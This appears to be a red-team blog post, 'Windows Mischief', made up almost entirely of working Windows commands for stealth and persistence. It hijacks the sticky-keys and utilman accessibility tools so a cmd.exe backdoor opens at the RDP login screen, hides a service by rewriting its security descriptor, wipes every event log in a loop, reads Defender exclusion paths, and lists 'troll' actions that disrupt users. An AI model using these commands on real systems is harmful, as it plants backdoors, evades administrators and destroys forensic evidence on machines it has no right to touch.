Windows Mischief
Ways to hide processes on Windows
Here are some of my ideas for hiding processes on a Windows system.
Registry Hijacks
Subvert sticky keys
Press F5 a bunch of times at an RDP login screen:
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe" /f
Subvert utility manager
Press Win+U at an RDP login screen:
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe" /f
Services
Hide a service
ref: https://www.sans.org/blog/red-team-tactics-hiding-windows-services/
Hide:
$env:SystemRoot\System32\sc.exe sdset HideMe "D:(D;;DCLCWPDTSD;;;IU)(D;;DCLCWPDTSD;;;SU)(D;;DCLCWPDTSD;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"
Unhide:
$env:SystemRoot\System32\sc.exe sdset HideMe "D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"
Add a network share to system PATH
Persistence
Rename Startup Folder
- appdomain hijack of server admin utility
- https://www.trustedsec.com/blog/bits-persistence-for-script-kiddies/
Trolls
- change keyboard to UK or DE
- Clear logs every few minutes, you know, for disk space reasons:
for /F "tokens=" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"
rundll32.exe user32.dll,LockWorkStation
reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v WallPaper /t REG_SZ /d " " /f
reg add "HKEY_CURRENT_USER\Control Panel\Colors" /v Background /t REG_SZ /d "255 0 0" /f
$WDAVprefs = Get-MpPreference; $WDAVprefs.ExclusionExtension; $WDAVprefs.ExclusionPath
Share this post
Twitter
Facebook
Reddit
LinkedIn
StumbleUpon
Pinterest
Email